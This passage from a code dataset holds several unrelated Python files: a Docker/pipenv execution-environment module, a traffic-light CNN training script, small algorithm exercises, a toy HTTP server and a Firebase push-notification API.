app.logger.removeHandler(default_handler)\n","sub_path":"server/tensai/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"266156862","text":"# -*- coding: utf-8 -*-\n\"\"\"exenv: module defining the execution environment object\n\nDefines a python and a docker execution environment\n\nTODO: allow a way to register 3rd party execution environments\n\"\"\"\nimport abc, re, os\n\nclass Exenv(abc.ABC):\n \"\"\"Exenv object\n defining common interface for exenvs\n the inheriting Exenv needs to define a class attribute `_uid_regex`,\n which should be a compiled regular expression with named groups.\n At the very least define a group \"typenv\" identifying the Exenv and \n a group \"uid\" that within the Exenv should fully define it.\n\n Args:\n uid (str): The string that uniquely identifies the execution environment.\n reco (Reconto): the research compendium that depends on this environment.\n \"\"\"\n def __init__(self,uid,reco):\n regex_attributes = self._uid_regex.fullmatch(uid).groupdict()\n for key in regex_attributes:\n setattr(self, key, regex_attributes[key])\n self.reco = reco\n \n @abc.abstractmethod\n def load_environment(self):\n pass\n\n 
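# For illustration, a hypothetical uid 'pyenv://py3.6/myenv' would make __init__\n # above set self.typenv='pyenv', self.pyver='py3.6' and self.uid='myenv', via the\n # named groups of the Pyenv regex defined further below.\n\n 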
@abc.abstractmethod\n def execute_command(self, command, *args):\n pass\n\n @abc.abstractmethod\n def stop_environment(self):\n pass\n\n @property\n @abc.abstractmethod\n def env_working_dir(self):\n pass\n\n def get_env_filepath(self,filepath):\n \"\"\"get an absolute filepath for set environment\n\n Args:\n filepath (str): should be a relative reco path\n for a data or result file/dir\n \"\"\"\n return os.path.join(self.env_working_dir,filepath)\n\n def get_env_data_filepath(self,filepath):\n \"\"\"get an absolute data filepath for set environment\n\n Args:\n filepath (str): should be a relative reco path\n for a data file/dir\n \"\"\"\n return os.path.join(self.env_working_dir,'data',filepath)\n\n def get_env_result_filepath(self,filepath):\n \"\"\"get an absolute result filepath for set environment\n\n Args:\n filepath (str): should be a relative reco path\n for a result file/dir\n \"\"\"\n return os.path.join(self.env_working_dir,'results',filepath)\n\n def reset_escaped_annotations(self, command):\n \"\"\"Reset the escaped annotations\n\n A command list can contain reco escaped bash symbols as elements,\n this function replaces them with their bash symbol.\n\n Args:\n command (str[]): a command list\n \"\"\"\n return [\n e if not e in self.reco.annotations['special']\n else self.reco.annotations['special'][e]\n for e in command\n ]\n\n def contains_escaped_annotations(self, command):\n \"\"\"Return if there are any escaped annotations\n\n Args:\n command (str[]): a command list\n \"\"\"\n for e in command:\n if e in self.reco.annotations['special']:\n return True\n #if this statement is reached no special annotations are present\n return False\n \n def __enter__(self):\n self.load_environment()\n return self\n \n def __exit__(self, exc_type, exc_value, traceback):\n self.stop_environment()\n\n @staticmethod\n def get_env(uid,reco):\n if uid.startswith('pyenv'): return Pyenv(uid,reco)\n elif uid.startswith('docker'): return Docker(uid,reco)\n else: raise NotImplementedError('in future should allow registering 3rd party env')\n\nclass Pyenv(Exenv):\n \"\"\"Python execution environment\"\"\"\n _uid_regex = re.compile(r'(?P<typenv>pyenv)://(?P<pyver>py\d\.\d)/(?P<uid>\w\S+)')\n\n @property\n def env_working_dir(self):\n return self.reco.path\n \n def load_environment(self):\n import plumbum as pb\n self.envdir = os.path.join(self.reco.path,'exenv',self.pyver,self.uid)\n if not os.path.exists(self.envdir):\n if not os.path.exists(os.path.join(self.reco.path,'exenv')):\n os.mkdir(os.path.join(self.reco.path,'exenv'))\n if not os.path.exists(os.path.join(self.reco.path,'exenv',self.pyver)):\n os.mkdir(os.path.join(self.reco.path,'exenv',self.pyver))\n os.mkdir(self.envdir)\n with pb.local.env(PIPENV_IGNORE_VIRTUALENVS=1):\n with pb.local.cwd(self.envdir):\n pb.local['pipenv']('--python','python'+self.pyver[2:])\n\n def execute_command(self, command, *args):\n import plumbum as pb\n if type(command) is str:\n command = (command,)\n with pb.local.env(PIPENV_IGNORE_VIRTUALENVS=1):\n with pb.local.cwd(self.envdir):\n pb.local['pipenv'].bound_command(\n 'run',*command,*args\n ) & pb.FG\n\n def stop_environment(self):\n del self.envdir\n \nclass Docker(Exenv):\n \"\"\"Docker container execution environment\"\"\"\n _uid_regex = re.compile(r'(?P<typenv>docker)://(?P<uid>\w\S+)')\n\n @property\n def env_working_dir(self):\n return '/app'\n \n def load_environment(self):\n import docker\n self.client = docker.from_env()\n\n def execute_command(self, command, *args):\n from docker.errors import ImageNotFound\n if args and 
type(command) is str:\n command += ' '+' '.join(args)\n elif type(command) is not str:\n escape_command = self.contains_escaped_annotations(command)\n if escape_command: command = self.reset_escaped_annotations(command)\n command = ' '.join(command) + ' ' + ' '.join(args)\n command = 'sh -c \"{}\"'.format(command.replace('\"',r'\\\"'))\n try:\n self.image = self.client.images.get(self.uid)\n except ImageNotFound:\n self.image = self.client.images.pull(self.uid)\n self.container = self.client.containers.create(\n self.uid, command,\n volumes={\n os.path.join(self.reco.path,'data'):{'bind':'/app/data','mode':'ro'},\n os.path.join(self.reco.path,'results'):{'bind':'/app/results','mode':'rw'},\n },\n working_dir = '/app'\n )\n self.container.start()\n\n def stop_environment(self):\n self.container.stop()\n del self.client, self.image, self.container\n","sub_path":"reconto/exenv.py","file_name":"exenv.py","file_ext":"py","file_size_in_byte":6280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"462471401","text":"import numpy as np\nimport os\nimport cv2\nfrom sklearn.model_selection import train_test_split\n\ndef get_files(dir_path):\n return [f for f in os.listdir(dir_path) if os.path.isfile(os.path.join(dir_path, f))]\n\ndataset_samples = []\ndataset_labels = []\n\ndef read_dataset_dir(dir_path, label, dataset_samples, dataset_labels):\n for filename in get_files(dir_path):\n image = cv2.cvtColor(cv2.imread(os.path.join(dir_path, filename)), cv2.COLOR_BGR2RGB)\n image = cv2.resize(image, (24, 72))\n dataset_samples.append(image)\n dataset_labels.append(label)\n\nred_samples, red_labels = [], []\nread_dataset_dir('dataset/red', 0, red_samples, red_labels)\n\nyellow_samples, yellow_labels = [], []\nread_dataset_dir('dataset/simulator/yellow', 1, yellow_samples, yellow_labels)\nread_dataset_dir('dataset/udacity-sdc/yellow', 1, yellow_samples, yellow_labels)\n\ngreen_samples, green_labels = [], []\nread_dataset_dir('dataset/udacity-sdc/green', 2, green_samples, green_labels)\nread_dataset_dir('dataset/simulator/green', 2, green_samples, green_labels)\n\nred_samples = np.array(red_samples)\nred_labels = np.array(red_labels)\n\nX_red_train, X_red_test, y_red_train, y_red_test = train_test_split(\n red_samples,\n red_labels,\n test_size=0.05,\n random_state=42\n)\n\nX_yellow_train, X_yellow_test, y_yellow_train, y_yellow_test = train_test_split(\n yellow_samples,\n yellow_labels,\n test_size=0.05,\n random_state=42\n)\n\nX_green_train, X_green_test, y_green_train, y_green_test = train_test_split(\n green_samples,\n green_labels,\n test_size=0.05,\n random_state=42\n)\n\nX_train = np.concatenate([X_red_train, X_yellow_train, X_green_train], axis=0)\ny_train = np.concatenate([y_red_train, y_yellow_train, y_green_train], axis=0)\n\nX_test = np.concatenate([X_red_test, X_yellow_test, X_green_test], axis=0)\ny_test = np.concatenate([y_red_test, y_yellow_test, y_green_test], axis=0)\n# Number of training examples\nn_train = X_train.shape [0]\n\n# Number of testing examples.\nn_test = X_test.shape [0]\n\n# What's the shape of a traffic sign image?\nimage_shape = X_train.shape [1:3]\n\n# How many unique classes/labels there are in the dataset.\nn_classes = 3\n\nprint(\"Number of training examples =\", n_train)\nprint(\"Number of testing examples =\", n_test)\nprint(\"Image data shape =\", image_shape)\nprint(\"Number of classes =\", n_classes)\n\ntrain_memory_amount = n_train * 
(image_shape[0] * image_shape[1] * 3 + n_classes) / 1024 / 1024\ntest_memory_amount = n_test * (image_shape[0] * image_shape[1] * 3 + n_classes) / 1024 / 1024\nall_memory_amount = train_memory_amount + test_memory_amount\nprint(\"Train memory amount (Mb) =\", train_memory_amount)\nprint(\"Test memory amount (Mb) =\", test_memory_amount)\nprint(\"All memory amount (Mb) =\", all_memory_amount)\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import ImageGrid\n\ntrain_classes_sizes = [np.count_nonzero(y_train==i) for i in range (n_classes)] \ntest_classes_sizes = [np.count_nonzero(y_test==i) for i in range (n_classes)] \n\ndef show_images_in_grid (images, rows, cols):\n fig = plt.figure (figsize=(5., 10.))\n grid = ImageGrid(fig, 111,\n nrows_ncols=(rows, cols),\n axes_pad=0.1\n )\n for i in range(len (images)):\n grid[i].imshow(images [i])\n\n plt.show()\n\n#table of traffic sign examples for different classes\nim_pos = 0\nX_train_examples = []\n# num_of_examples = 10\nfor i in range(n_classes):\n X_train_examples.append (X_train [im_pos])\n im_pos += train_classes_sizes [i]\n\nshow_images_in_grid (X_train_examples, 1, n_classes)\n\n#counts of examples in each class\nplt.figure ()\nplt_x = range (n_classes)\ntrain_classes_sizes = [np.count_nonzero(y_train==i) for i in range (n_classes)] \ntest_classes_sizes = [np.count_nonzero(y_test==i) for i in range (n_classes)] \nplt.bar (plt_x, train_classes_sizes, color=(0.2588,0.4433,1.0))\nplt.bar (plt_x, test_classes_sizes, color=(1.0,0.5,0.62))\nplt.xlabel ('Traffic lights id')\nplt.ylabel ('Count')\nplt.title ('Traffic lights counts in each class train and test dataset')\nplt.show ()\nX_train_preprocessed = np.divide(X_train, 255).astype (np.float32)\nX_test_preprocessed = np.divide(X_test, 255).astype (np.float32)\n\n#dividing into train and validation dataset\n\ndef shuffle_dataset (dataset_x, dataset_y):\n assert len (dataset_x) == len (dataset_y)\n p = np.random.permutation(len(dataset_x))\n return dataset_x [p], dataset_y [p]\n\ndef split_into_train_and_validation_dataset (dataset_x, dataset_y, train_proportion):\n train_samples_by_classes = []\n train_labels_by_classes = []\n X_train_samples = np.zeros ((0, image_shape[0], image_shape[1], 3))\n y_train_samples = np.zeros ((0,))\n X_validation_samples = np.zeros ((0, image_shape[0], image_shape[1], 3))\n y_validation_samples = np.zeros ((0,))\n sample_index = 0\n for class_size in train_classes_sizes:\n train_samples_count = int(train_proportion * class_size)\n\n #get and shuffle one class's samples\n dataset_x_for_class = dataset_x[sample_index:sample_index + class_size]\n dataset_y_for_class = dataset_y[sample_index:sample_index + class_size]\n dataset_x_for_class, dataset_y_for_class = shuffle_dataset (dataset_x_for_class, dataset_y_for_class)\n \n #splitting to train and validation dataset\n X_train_for_class = dataset_x_for_class[0:train_samples_count]\n y_train_for_class = dataset_y_for_class[0:train_samples_count]\n X_valid_for_class = dataset_x_for_class[train_samples_count:class_size]\n y_valid_for_class = dataset_y_for_class[train_samples_count:class_size]\n \n #storing train samples by classes\n #this will be used later to generate augmented dataset\n train_samples_by_classes.append (X_train_for_class)\n train_labels_by_classes.append (y_train_for_class)\n \n #storing samples in corresponding datasets\n X_train_samples = np.concatenate((X_train_samples, X_train_for_class), axis=0)\n y_train_samples = np.concatenate((y_train_samples, y_train_for_class), axis=0)\n 
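#likewise append this class's held-out slice to the validation arrays\n 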
X_validation_samples = np.concatenate((X_validation_samples, X_valid_for_class), axis=0)\n y_validation_samples = np.concatenate((y_validation_samples, y_valid_for_class), axis=0)\n \n sample_index += class_size\n \n return X_train_samples, y_train_samples, X_validation_samples, y_validation_samples, train_samples_by_classes, train_labels_by_classes\n\nX_train_for_learning, \\\ny_train_for_learning, \\\nX_valid_for_learning, \\\ny_valid_for_learning, \\\nsamples_by_classes, \\\nlabels_by_classes = split_into_train_and_validation_dataset (X_train_preprocessed, y_train, 0.8)\n\n\nimport random as rand\nimport cv2 \n\n# generate @generate_count images from given @images\ndef augment_images (images, generate_count):\n images_last_index = len (images) - 1\n augmented = []\n for i in range (generate_count):\n im1 = images [rand.randint (0, images_last_index)]\n \n #rotation and scaling\n Mrot = cv2.getRotationMatrix2D((16,16),rand.uniform(-5.0, 5.0), rand.uniform(0.95, 1.05))\n\n #affine transform and shifts\n pts1 = np.float32([[0,0],[image_shape[1],0],[image_shape[1], image_shape[0]]])\n a = 5\n shift = 8\n shiftx = rand.randint (-shift, shift)\n shifty = rand.randint (-shift, shift)\n pts2 = np.float32([[\n 0 + rand.randint (-a, a) + shiftx,\n 0 + rand.randint (-a, a) + shifty\n ],[\n image_shape[1] + rand.randint (-a, a) + shiftx,\n 0 + rand.randint (-a, a) + shifty\n ],[\n image_shape[1] + rand.randint (-a, a) + shiftx,\n image_shape[0] + rand.randint (-a, a) + shifty\n ]])\n M = cv2.getAffineTransform(pts1,pts2)\n (h, w) = im1.shape[:2]\n\n augmented_image = cv2.warpAffine(\n cv2.warpAffine (\n im1\n , Mrot, (w, h)\n )\n , M, (w,h)\n )\n \n augmented_image += rand.uniform(-0.2, 0.2)\n np.clip(augmented_image, 0.0, 1.0, out=augmented_image)\n \n augmented.append (augmented_image)\n \n return augmented\n\n\nX_train_augmented = np.zeros ((0, image_shape[0], image_shape[1], 3))\ny_train_augmented = np.zeros ((0,))\n\n#generate up to 3000 images for each class\n#augmented dataset will contain only generated images\naugment_limit = 3000\ndef augment_dataset ():\n global X_train_augmented\n global y_train_augmented\n X_train_augmented = np.zeros ((0, image_shape[0], image_shape[1], 3))\n y_train_augmented = np.zeros ((0,))\n \n for augmenting_index in range(n_classes):\n samples = samples_by_classes [augmenting_index]\n labels = labels_by_classes [augmenting_index]\n\n augment_count = augment_limit\n new_samples = augment_images (samples, augment_count)\n y_train_augmented = np.concatenate((y_train_augmented, [augmenting_index for i in range (augment_count)]), axis=0)\n\n X_train_augmented = np.concatenate((X_train_augmented, new_samples), axis=0)\n \nimport tensorflow as tf\ntf.reset_default_graph()\n\nbatch_size = 128\n\nimport math\n# I took this from my solution to the lab quiz\ndef batches(batch_size, features, labels):\n \"\"\"\n Create batches of features and labels\n :param batch_size: The batch size\n :param features: List of features\n :param labels: List of labels\n :return: Batches of (Features, Labels)\n \"\"\"\n assert len(features) == len(labels)\n batches_arr = []\n num_full_batches = math.floor(len(features) / batch_size)\n num_full_batches_samples = num_full_batches * batch_size\n sample_index = 0\n while (sample_index < num_full_batches_samples):\n batches_arr.append ([features[sample_index:sample_index+batch_size], labels[sample_index:sample_index+batch_size]])\n sample_index += batch_size\n \n if (num_full_batches_samples != len(features)):\n left_samples = len(features) 
- num_full_batches_samples\n batches_arr.append ([features[-left_samples:], labels[-left_samples:]])\n \n return batches_arr\n\n#flatten the last convolution layer to use it in the MLP network\ndef flatten (batch):\n flatten_size = np.prod(batch.get_shape().as_list()[1:])\n return tf.reshape(batch, [-1, flatten_size]), flatten_size\n\n#generate CNN based on parameters\ndef gen_model(cnn_input, cnn_weights, cnn_strides, cnn_nonlinearities, cnn_maxpooling, mlp_layers, mlp_nonlinearities):\n\n cnn_layer_input = cnn_input\n cnn_outputs = []\n for W, s, n, p in zip(cnn_weights, cnn_strides, cnn_nonlinearities, cnn_maxpooling):\n\n W_var = tf.Variable (tf.truncated_normal(W, stddev=0.01))\n cnn_layer_input = tf.nn.conv2d (cnn_layer_input, W_var, strides=s, padding='SAME')\n\n b_var = tf.Variable(tf.zeros(W[3]))\n cnn_layer_input = tf.nn.bias_add(cnn_layer_input, b_var)\n\n cnn_layer_input = n (cnn_layer_input)\n\n cnn_layer_input = tf.nn.max_pool(cnn_layer_input, ksize=[1, p[0], p[1], 1], strides=[1, p[0], p[1], 1], padding='SAME')\n cnn_outputs.append (cnn_layer_input)\n\n cnn_output_flatten_pre, cnn_output_flatten_pre_size = flatten (cnn_outputs[-2])\n cnn_output_flatten, cnn_output_flatten_size = flatten (cnn_layer_input)\n #print the last and previous conv layers' flattened sizes, just for information\n print (\"cnn pre: \", cnn_output_flatten_pre_size)\n print (\"cnn: \", cnn_output_flatten_size)\n \n mlp_input = tf.concat ([cnn_output_flatten_pre, cnn_output_flatten], 1)\n mlp_input_size = cnn_output_flatten_pre_size + cnn_output_flatten_size\n \n mlp_layers.insert(0, mlp_input_size)\n for i in range(len(mlp_layers)-1):\n W_var = tf.Variable (tf.truncated_normal([mlp_layers[i], mlp_layers[i+1]], stddev=0.01))\n b_var = tf.Variable(tf.zeros(mlp_layers[i+1]))\n mlp_input = mlp_nonlinearities [i] (tf.matmul (mlp_input, W_var) + b_var)\n\n return mlp_input\n\n#parameters of the CNN\ncnn_input = tf.placeholder (tf.float32, shape=(None, image_shape[0], image_shape[1], 3), name='input_image')\ncnn_layers = [[5, 5, 3, 16], [5, 5, 16, 32], [5, 5, 32, 32], [5, 5, 32, 32]] #conv size x, conv size y, in channels, out channels\ncnn_strides = [[1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1]] #1, stride x, stride y, 1\ncnn_pooling = [[2, 2], [2, 2], [2, 2], [2, 2]]\ncnn_nonlinearities = [tf.nn.relu, tf.nn.relu, tf.nn.relu, tf.nn.relu]\n\n#parameters of MLP\nmlp_layers = [256, n_classes]\nmlp_nonlinearities = [tf.nn.tanh, tf.identity]\n\nmodel = gen_model (cnn_input, cnn_layers, cnn_strides, cnn_nonlinearities, cnn_pooling, mlp_layers, mlp_nonlinearities)\nmodel = tf.identity(model, name='model_output')\n\ny_correct = tf.placeholder (tf.int32, shape=(None,))\nY_batch_onehot = tf.one_hot (y_correct, n_classes)\n\nloss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=model, labels=Y_batch_onehot))\nopt = tf.train.AdamOptimizer(learning_rate=0.0005)\ntrain_op = opt.minimize(loss_op)\ncorrect_prediction = tf.equal(tf.argmax(model, 1), tf.argmax(Y_batch_onehot, 1))\naccuracy_op = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nepochs = 10\n\n#test given dataset with model\ndef test_dataset (dataset_x, dataset_y):\n test_loss = 0\n test_acc = 0\n test_num_batches = 0\n for X_batch, Y_batch in batches (batch_size, dataset_x, dataset_y):\n loss_val_test, acc_val_test = sess.run ([loss_op, accuracy_op], feed_dict={cnn_input: X_batch, y_correct: Y_batch})\n test_loss += loss_val_test\n test_acc += acc_val_test\n test_num_batches += 1\n\n test_loss /= test_num_batches\n test_acc /= 
test_num_batches\n return test_loss, test_acc\n\nsaver = tf.train.Saver ()\n\nwith tf.Session () as sess:\n sess.run (tf.global_variables_initializer())\n \n for i in range (epochs):\n \n #generate and shuffle new training samples for each epoch \n augment_dataset ()\n train_dataset_x, train_dataset_y = shuffle_dataset (X_train_augmented, y_train_augmented)\n\n #train only on generated samples\n for X_batch, Y_batch in batches (batch_size, train_dataset_x, train_dataset_y):\n loss_val, acc_val, _ = sess.run ([loss_op, accuracy_op, train_op], feed_dict={cnn_input: X_batch, y_correct: Y_batch})\n \n\n train_loss, train_acc = test_dataset (X_train_for_learning, y_train_for_learning)\n valid_loss, valid_acc = test_dataset (X_valid_for_learning, y_valid_for_learning)\n \n print (i,\" train loss: \", train_loss, \" acc: \", train_acc, \" valid loss: \", valid_loss, \" acc: \", valid_acc)\n\n #testing against test.p\n test_loss, test_acc = test_dataset (X_test_preprocessed, y_test)\n print (\"test loss: \", test_loss, \" acc: \", test_acc)\n \n saver.save (sess, 'tf-saves/cnn.ckpt')\n","sub_path":"test_functions.py","file_name":"test_functions.py","file_ext":"py","file_size_in_byte":14977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"255590235","text":"# sieve  # prime array\r\nimport array\r\nN = 100000002\r\n#prime = array.array('i',[1]*N)\r\nprime = [1]*N\r\n\r\n#print(prime[10000000-1])\r\nprimelist = []\r\n\r\n\r\n# sieve\r\n\r\ndef siv(n):\r\n\tcnt = 0\r\n\tprime[0] = 0\r\n\tprime[1] = 0\r\n\t#primelist.append(2)\r\n\t#for i in range(4,n+1,2):\r\n\t\r\n\t#\tprime[i] = 0\r\n\tfor i in range(3, n+1, 2):\r\n\t\tif i*i > n:\r\n\t\t\tbreak\r\n\r\n\t\tif prime[i] == 1:\r\n\t\t\t#primelist.append(i)\r\n\t\t\t#cnt += 1\r\n\t\t\tfor j in range(i*i, n+1, 2*i):\r\n\t\t\t\tprime[j] = 0\r\n\t\r\n\r\ndef printprime(n):\r\n\tcnt = 0\r\n\tj = 0\r\n\ti = 3\r\n\tprimelist.append(2)\r\n\twhile i < n+1:\r\n\r\n\t\tif j > 5000001 :\r\n\t\t\tbreak\r\n\r\n\t\tif prime[i] == 1:\r\n\t\t\tprimelist.append(i)\r\n\t\t\tj +=1\r\n\t\t\t\r\n\t\tcnt += 1\r\n\t\ti += 2\r\n\t#print(cnt)\r\n#main\r\n\r\nsiv(90000000)\r\n#print(\"hei\")\r\nprintprime(90000000)\r\n#print(\"hei\")\r\n#print(primelist[5000000-4])\r\nq = int(input())\r\nwhile q > 0:\r\n\tq -= 1\r\n\tk = int(input())\r\n\tprint(primelist[k-1])\r\n#print(cnt)","sub_path":"Category/Number Theory/SPOJ - TDKPRIME.py","file_name":"SPOJ - TDKPRIME.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"261971956","text":"#Returns index of x in arr if it is present\ndef search(arr, x):\n n = len(arr)\n for i in range(0, n):\n if (x == arr[i]):\n return i\n return -1\n\n#Input number of test cases\nt = int(input()) \n\n#One by one run for all input test cases\nfor i in range(t):\n #print(i, end =\" \")\n #Input the size of the array\n n = int(input())\n \n #Input the array\n arr = list(map(int, input().split()))\n \n #Input the element to be searched\n x = int(input())\n \n print(arr)\n print(search(arr,x))\n #print(arr)","sub_path":"SuoPlacement2019_Python/com/ikbal/ds/string/CompetitiveProgramming.py","file_name":"CompetitiveProgramming.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"55395094","text":"import numpy as np\n\n\nmatrizEjemplo = np.array([[89, 13, 23, 72],\n [29, 11, 81, 62],\n [27, 26, 88, 33],\n [ 5, 78, 11, 
11]])\n\ndef solucion(A):\n n = A.shape[0]\n print(f'dimension {n}')\n sum_diagonal_principal = 0\n prod_diagonal_secundaria = 1\n # resultado2_mod_resultado1 = prod_diagonal_secundaria % sum_diagonal_principal\n\n for index, data in np.ndenumerate(A):\n # identify the i and j value of each element of the matrix\n i = index[0]\n j = index[1] \n # check whether an element is on the main diagonal\n if i == j:\n # print(\"main diagonal: \", data) \n sum_diagonal_principal = sum_diagonal_principal + data\n # if (n - i - 1) == j:\n if (i + j) == (n-1):\n print(\"secondary diagonal\", data)\n prod_diagonal_secundaria = prod_diagonal_secundaria * data\n\n\n print(f'main diagonal sum: {sum_diagonal_principal}')\n print(f'secondary diagonal product: {prod_diagonal_secundaria}')\n resultado2_mod_resultado1 = prod_diagonal_secundaria % sum_diagonal_principal\n print(f'modulo: {resultado2_mod_resultado1}')\n\n \n\n \n \n # return sum_diagonal_principal, prod_diagonal_secundaria, resultado2_mod_resultado1\n\nsolucion(matrizEjemplo)\n\n ","sub_path":"semana4/examenMatriz.py","file_name":"examenMatriz.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"139498303","text":"# coding = utf-8\nimport http.server\nimport os\n\n\nclass MyHTTPHandler(http.server.BaseHTTPRequestHandler):\n\n def handle(self):\n print('request:', self.request)\n print('rfile:', self.rfile)\n # print('rfile:', self.rfile)\n # print('wfile:', self.wfile)\n # self.wfile.write('<h1>This is a response from the server</h1>'.encode('utf-8')) # response body\n # while True:\n # buffer = self.request.recv(1024*4, 0)\n # if not buffer:\n # break;\n # print(buffer.decode())\n while True:\n buffer = self.rfile.read(1024 * 4)\n if not buffer:\n break\n print(buffer.decode())\n\n\nprint('PID (to make killing the process easier):', os.getpid())\nprint('Starting server')\nserver = http.server.HTTPServer(\n server_address=('', 11111),\n RequestHandlerClass=MyHTTPHandler,\n bind_and_activate=True)\nprint('Accepting user requests')\nserver.serve_forever()\nprint('Server exited')\n","sub_path":"day04/codes/c04_httpserver_BaseHTTPRequestHandler4.py","file_name":"c04_httpserver_BaseHTTPRequestHandler4.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143059552","text":"import json\nimport logging.config\nimport os\n\n\ndef setup_logging(default_path='logging.json', default_level=logging.INFO):\n \"\"\"\n Setup logging configuration\n \"\"\"\n BASE_DIR = os.path.dirname(os.path.abspath('.'))\n CONFIG_DIR = os.path.join(BASE_DIR, \"config\")\n path = os.path.join(CONFIG_DIR, default_path)\n if os.path.exists(path):\n with open(path, 'rt') as f:\n config = json.load(f)\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n\n\ndef doSomething():\n logging.info('hello logging')\n logging.debug('this is a bug')\n\n\nif __name__ == '__main__':\n setup_logging()\n doSomething()\n","sub_path":"InnerModule/loggerLearn2.py","file_name":"loggerLearn2.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241094911","text":"import string, time\nimport random\nimport uuid\nimport base64, re\nimport binascii\nimport aiohttp\nimport ujson\nfrom math import floor\n\nfrom gatco.response import json, text, html\nfrom application.extensions import sqlapimanager\nfrom application.models import User, Permission, Role, NotifyUser, Notify\nfrom application.extensions import auth\nfrom application.database import db, redisdb\nfrom application.server import app\nfrom gatco_restapi.helpers import to_dict\nfrom application.controllers.helper import current_uid, current_user\n\n\nasync def apply_user_filter(request=None, search_params=None, **kw):\n currentUser = await current_user(request)\n if currentUser is not None:\n search_params[\"filters\"] = {\"user_id\": {\"$eq\": str(currentUser.id)}}\n else:\n return json({\"error_code\": \"USER_NOT_FOUND\", \"error_message\": \"\"}, status=520)\n\n\nasync def send_notify_single(user_id, notify_data):\n# title = db.Column(String, index=True)\n# content = db.Column(String)\n# type = db.Column(String(20)) # text/image/video\n# url = db.Column(String)\n# action = db.Column(JSONB())\n# notify_condition = db.Column(JSONB())\n\n data = request.json\n firebase_token = redisdb.get(\"notify_token:\" + user_id)\n if firebase_token is not None:\n firebase_token = firebase_token.decode('utf8')\n\nasync def postprocess_send_notify_cosoKCB(request=None, Model=None, result=None, **kw):\n notify_condition = result[\"notify_condition\"]\n if notify_condition is not None:\n notify_user_list = []\n for condition in notify_condition:\n users = []\n if condition.get(\"notify_type\", \"\") == \"TO_ALL\":\n users = db.session.query(User).has_role(\"CoSoKCB\").all()\n\n if condition.get(\"notify_type\", \"\") == \"TO_PHONE\":\n phone_list = condition.get(\"notify_phone_number\", [])\n for phone in phone_list:\n user = db.session.query(User).filter(User.phone_number == 
phone).first()\n users.append(user)\n\n for user in users:\n notify_user = NotifyUser()\n notify_user.user_id = str(user.id)\n notify_user.notify_id = result[\"id\"]\n notify_user.notify_at = floor(time.time())\n db.session.add(notify_user)\n # notify user\n user_notify_token = redisdb.get(\"notify_token:\" + str(user.id))\n\n if user_notify_token is not None:\n user_notify_token = user_notify_token.decode('utf8')\n notify_user_list.append(user_notify_token)\n db.session.commit()\n noti_data = {\n \"push_type\": \"NORMAL\",\n \"notify_id\": result[\"id\"]\n }\n\n await send_firebase_notify(notify_user_list, result[\"title\"], noti_data)\n\n\nsqlapimanager.create_api(Notify, max_results_per_page=1000000,\n methods=['GET', 'POST', 'DELETE', 'PUT'],\n url_prefix='/api/v1',\n preprocess=dict(GET_SINGLE=[], GET_MANY=[], POST=[], PUT_SINGLE=[]),\n postprocess=dict(POST=[postprocess_send_notify_cosoKCB]),\n collection_name='notify')\n\nsqlapimanager.create_api(NotifyUser, max_results_per_page=1000000,\n methods=['GET', 'POST', 'DELETE', 'PUT'],\n url_prefix='/api/v1',\n preprocess=dict(GET_SINGLE=[], GET_MANY=[apply_user_filter], POST=[], PUT_SINGLE=[]),\n postprocess=dict(POST=[]),\n collection_name='notify_user')\n\n\n@app.route('/api/v1/send_notify', methods=['POST'])\nasync def send_notify(request):\n data = request.json\n phone_number = data.get(\"phone_number\", None)\n if phone_number is not None:\n user = db.session.query(User).filter(User.phone_number == phone_number).first()\n print(\"user: \", user)\n if user is not None:\n firebase_token = redisdb.get(\"notify_token:\" + str(user.id))\n print(\"firebase_token: \", firebase_token)\n if firebase_token is not None:\n firebase_token = firebase_token.decode('utf8')\n await send_firebase_notify([firebase_token], data.get(\"title\", \"Test\"), data)\n\n return json({})\n\n\n@app.route('/api/v1/set_notify_token', methods=['POST'])\nasync def set_notify_token(request):\n currentUser = await current_user(request)\n if currentUser is None:\n return json({\n \"error_code\": \"USER_NOT_LOGIN\",\n \"error_message\": None\n }, status=520)\n\n data = request.json\n token = data.get(\"data\", None)\n redisdb.set(\"notify_token:\" + str(currentUser.id), token)\n\n return json({})\n\n\n@app.route('/api/v1/test_notify', methods=['POST'])\nasync def test_notify(request):\n currentUser = await current_user(request)\n if currentUser is None:\n return json({\n \"error_code\": \"USER_NOT_LOGIN\",\n \"error_message\": None\n }, status=520)\n \n data = request.json\n firebase_token = redisdb.get(\"notify_token:\" + str(currentUser.id))\n if firebase_token is not None:\n firebase_token = firebase_token.decode('utf8')\n\n# data = {\n# \"data\": {\n# \"push_type\": \"UPDATE_TRANSACTION\",\n# \"transaction_hash\": transaction_hash,\n# \"title\": body\n# },\n# \"notification\" : {\n# \"body\": body,\n# \"sound\": \"bell.mp3\"\n# },\n# \"registration_ids\": [from_token]\n# }\n\n await send_firebase_notify([firebase_token], data.get(\"title\", \"Notification\"), data)\n\n return json({})\n else:\n return json({\"error_code\": \"KEY_NOT_SET\", \"error_message\": \"\"}, status=520)\n\n\nasync def send_firebase_notify(firebase_tokens, body, data):\n server_key = app.config.get(\"FIREBASE_SERVER_KEY\")\n fb_headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"key=\" + server_key\n }\n\n url = 